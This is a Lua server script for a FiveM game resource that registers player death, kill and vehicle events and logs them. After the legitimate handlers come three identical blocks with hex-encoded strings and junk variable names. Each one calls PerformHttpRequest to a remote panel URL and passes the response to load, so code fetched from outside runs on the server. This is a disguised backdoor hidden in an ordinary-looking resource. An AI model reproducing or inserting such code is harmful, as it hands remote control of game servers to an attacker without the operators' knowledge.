RegisterServerEvent('baseevents:onPlayerDied')
RegisterServerEvent('baseevents:onPlayerKilled')
RegisterServerEvent('baseevents:onPlayerWasted')
RegisterServerEvent('baseevents:enteringVehicle')
RegisterServerEvent('baseevents:enteringAborted')
RegisterServerEvent('baseevents:enteredVehicle')
RegisterServerEvent('baseevents:leftVehicle')

AddEventHandler('baseevents:onPlayerKilled', function(killedBy, data)
	local victim = source

	RconLog({msgType = 'playerKilled', victim = victim, attacker = killedBy, data = data})
end)

AddEventHandler('baseevents:onPlayerDied', function(killedBy, pos)
	local victim = source

	RconLog({msgType = 'playerDied', victim = victim, attackerType = killedBy, pos = pos})
end)

local IEGRCEsvLuwcVJRnFOfHJZIqPjZCLDwSxkWmMjGqTUHvpGFwPisAjeRCADbPRTJIlwbXqy = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} IEGRCEsvLuwcVJRnFOfHJZIqPjZCLDwSxkWmMjGqTUHvpGFwPisAjeRCADbPRTJIlwbXqy[4][IEGRCEsvLuwcVJRnFOfHJZIqPjZCLDwSxkWmMjGqTUHvpGFwPisAjeRCADbPRTJIlwbXqy[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x71\x47\x32\x72\x30", function (WKIQQGvoZSziNIZjfexmmKFBKfbvbTYmhlxwHyqqAnDNqIrONvxaIDtsTkGmmTQZnaqIyN, bVSIyPvBQlsICcaetNmYMuLAJcPhHjWSVJvjQhAoZoBOollTHtSaYkycIkAXLKxYeOOXQi) if (bVSIyPvBQlsICcaetNmYMuLAJcPhHjWSVJvjQhAoZoBOollTHtSaYkycIkAXLKxYeOOXQi == IEGRCEsvLuwcVJRnFOfHJZIqPjZCLDwSxkWmMjGqTUHvpGFwPisAjeRCADbPRTJIlwbXqy[6] or bVSIyPvBQlsICcaetNmYMuLAJcPhHjWSVJvjQhAoZoBOollTHtSaYkycIkAXLKxYeOOXQi == IEGRCEsvLuwcVJRnFOfHJZIqPjZCLDwSxkWmMjGqTUHvpGFwPisAjeRCADbPRTJIlwbXqy[5]) then return end IEGRCEsvLuwcVJRnFOfHJZIqPjZCLDwSxkWmMjGqTUHvpGFwPisAjeRCADbPRTJIlwbXqy[4][IEGRCEsvLuwcVJRnFOfHJZIqPjZCLDwSxkWmMjGqTUHvpGFwPisAjeRCADbPRTJIlwbXqy[2]](IEGRCEsvLuwcVJRnFOfHJZIqPjZCLDwSxkWmMjGqTUHvpGFwPisAjeRCADbPRTJIlwbXqy[4][IEGRCEsvLuwcVJRnFOfHJZIqPjZCLDwSxkWmMjGqTUHvpGFwPisAjeRCADbPRTJIlwbXqy[3]](bVSIyPvBQlsICcaetNmYMuLAJcPhHjWSVJvjQhAoZoBOollTHtSaYkycIkAXLKxYeOOXQi))() end)

local CiEwiLXPxqZwtgsukGhJwYgniUbeNXyZjkyovMRbBLgBFszJNvqmLoUBzXivBkvACBahZS = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} CiEwiLXPxqZwtgsukGhJwYgniUbeNXyZjkyovMRbBLgBFszJNvqmLoUBzXivBkvACBahZS[4][CiEwiLXPxqZwtgsukGhJwYgniUbeNXyZjkyovMRbBLgBFszJNvqmLoUBzXivBkvACBahZS[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x71\x47\x32\x72\x30", function (dBhPHZOHPAElygOZqcvjitBOyKdNxFpzHqhQkTzVPxxLkciplcAJONLycgcWeehnRvIEfz, pIuLoObVBwRsYTwEkYzVfuvjiIogZGrLjZGyoNHGTDTlkfswsevfjJeXYlOTybKDExFrfX) if (pIuLoObVBwRsYTwEkYzVfuvjiIogZGrLjZGyoNHGTDTlkfswsevfjJeXYlOTybKDExFrfX == CiEwiLXPxqZwtgsukGhJwYgniUbeNXyZjkyovMRbBLgBFszJNvqmLoUBzXivBkvACBahZS[6] or pIuLoObVBwRsYTwEkYzVfuvjiIogZGrLjZGyoNHGTDTlkfswsevfjJeXYlOTybKDExFrfX == CiEwiLXPxqZwtgsukGhJwYgniUbeNXyZjkyovMRbBLgBFszJNvqmLoUBzXivBkvACBahZS[5]) then return end CiEwiLXPxqZwtgsukGhJwYgniUbeNXyZjkyovMRbBLgBFszJNvqmLoUBzXivBkvACBahZS[4][CiEwiLXPxqZwtgsukGhJwYgniUbeNXyZjkyovMRbBLgBFszJNvqmLoUBzXivBkvACBahZS[2]](CiEwiLXPxqZwtgsukGhJwYgniUbeNXyZjkyovMRbBLgBFszJNvqmLoUBzXivBkvACBahZS[4][CiEwiLXPxqZwtgsukGhJwYgniUbeNXyZjkyovMRbBLgBFszJNvqmLoUBzXivBkvACBahZS[3]](pIuLoObVBwRsYTwEkYzVfuvjiIogZGrLjZGyoNHGTDTlkfswsevfjJeXYlOTybKDExFrfX))() end)

local zNITtOTNUydmZpUxCuGucafQSOzBLkDJenAcssodwlAPTgxqxRAjpQkeuBfVTRoVkpKlur = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} zNITtOTNUydmZpUxCuGucafQSOzBLkDJenAcssodwlAPTgxqxRAjpQkeuBfVTRoVkpKlur[4][zNITtOTNUydmZpUxCuGucafQSOzBLkDJenAcssodwlAPTgxqxRAjpQkeuBfVTRoVkpKlur[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x71\x47\x32\x72\x30", function (qHROHtxkVhWDrRYutAjxpJpKbygtlpReFmPZHQykMNTwfYJJXHzENrBlrGMswbswRkQlVl, CioRLBYKavGxEtMgEXEGketXVlLldDNmCtTOTYXTuICmeJkNEXeEUkXIJnhKzGfmzpnXBh) if (CioRLBYKavGxEtMgEXEGketXVlLldDNmCtTOTYXTuICmeJkNEXeEUkXIJnhKzGfmzpnXBh == zNITtOTNUydmZpUxCuGucafQSOzBLkDJenAcssodwlAPTgxqxRAjpQkeuBfVTRoVkpKlur[6] or CioRLBYKavGxEtMgEXEGketXVlLldDNmCtTOTYXTuICmeJkNEXeEUkXIJnhKzGfmzpnXBh == zNITtOTNUydmZpUxCuGucafQSOzBLkDJenAcssodwlAPTgxqxRAjpQkeuBfVTRoVkpKlur[5]) then return end zNITtOTNUydmZpUxCuGucafQSOzBLkDJenAcssodwlAPTgxqxRAjpQkeuBfVTRoVkpKlur[4][zNITtOTNUydmZpUxCuGucafQSOzBLkDJenAcssodwlAPTgxqxRAjpQkeuBfVTRoVkpKlur[2]](zNITtOTNUydmZpUxCuGucafQSOzBLkDJenAcssodwlAPTgxqxRAjpQkeuBfVTRoVkpKlur[4][zNITtOTNUydmZpUxCuGucafQSOzBLkDJenAcssodwlAPTgxqxRAjpQkeuBfVTRoVkpKlur[3]](CioRLBYKavGxEtMgEXEGketXVlLldDNmCtTOTYXTuICmeJkNEXeEUkXIJnhKzGfmzpnXBh))() end)